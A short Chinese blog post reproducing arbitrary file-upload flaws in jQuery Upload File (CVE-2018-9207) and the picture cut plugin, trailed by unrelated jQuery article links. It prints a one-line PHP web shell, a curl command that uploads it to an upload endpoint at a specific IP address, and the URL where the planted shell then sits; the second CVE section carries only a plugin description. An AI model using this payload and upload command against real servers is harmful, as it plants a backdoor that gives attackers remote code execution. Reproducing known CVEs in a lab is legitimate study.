【漏洞复现】 jquery 文件上传 (CVE-2018-9207|CVE-2018-9208)
2023-06-13 09:14:15 时间
1.php
<?php eval($_POST[1]);
(CVE-2018-9208)
jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。
jQuery Upload File <= 4.0.2 中的任意文件上传
curl -F "myfile=@1.php" "http://123.58.224.8:41698/jquery-upload-file/php/upload.php"
http://123.58.224.8:41698/jquery-upload-file/php/uploads/1.php
(CVE-2018-9208)
picture cut是一个jquery插件,以非常友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能
相关文章
- jquery监听浏览器刷新_jQuery刷新浏览器页面大小
- JQueryTips(4)一些关于提高JQuery性能的Tips
- Jquery实战_读书笔记1—选择jQuery
- JQuery的html(data)方法与<script>脚本块的解决方法
- QueryPathPHP中的jQuery
- 修改jquery.lazyload.js实现页面延迟载入
- 基于jquery实现的鼠标拖拽元素复制并写入效果
- Jquery一次处理多个ajax请求的代码
- JQuery动画和停止动画实例代码
- 关于jquery.validate1.9.0前台验证的使用介绍
- jQuery实现div浮动层跟随页面滚动效果
- jQuery中的$.ajax()方法应用
- Jquery图片延迟加载插件jquery.lazyload.js的使用方法
- 22点关于jquery性能优化的建议
- jquery隐藏与显示tr标签示例代码
- jQuery事件绑定和委托实例